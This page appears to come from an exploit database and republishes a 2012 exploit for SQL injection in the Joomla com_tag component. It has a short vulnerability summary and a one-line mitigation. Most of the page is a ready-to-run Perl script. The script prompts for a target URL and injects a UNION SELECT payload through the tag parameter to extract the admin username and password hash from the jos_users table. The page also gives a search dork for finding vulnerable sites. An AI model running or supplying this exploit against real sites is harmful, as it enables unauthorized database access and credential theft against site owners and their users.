Joomla tag Remote Sql Exploit

vendor:

Joomla Tag

by:

Daniel Barragan 'D4NB4R'

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla Tag

Affected Version From: all

Affected Version To: all

Patch Exists: NO

Related CWE: N/A

CPE: a:joomlatags:joomla_tag

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux(bt5)-Windows(7ultimate)

2012

Joomla tag Remote Sql Exploit

A vulnerability in the Joomla tag component allows an attacker to inject malicious SQL commands into the application. This exploit allows an attacker to gain access to the admin user and password of the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

 Exploit Title: Joomla tag Remote Sql Exploit

 dork: inurl:index.php?option=com_tag
 
 Date: [18-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 Vendor: http://www.joomlatags.org
 
 Version: all 
 
 License: Non-Commercial

 Download: http://www.joomlatags.org/joomla-tag/joomla-tag-download.html
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion: 

N/A

Exploit: 


    #!/usr/bin/perl -w
    # Joomla Component (tag) Remote SQL Exploit
    #----------------------------------------------------------------------------#

    ########################################
    print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t      Joomla com_tag Remote Sql Exploit \n";
print "\t\n\n";

use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";

chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jos_users";
    $d4n="com_tag&task";
    $component="tag&lang=es";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    
    $host = $target ."index.php?option=".$d4n."=".$component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
   
    

_____________________________________________________
Daniel Barragan "D4NB4R" 2012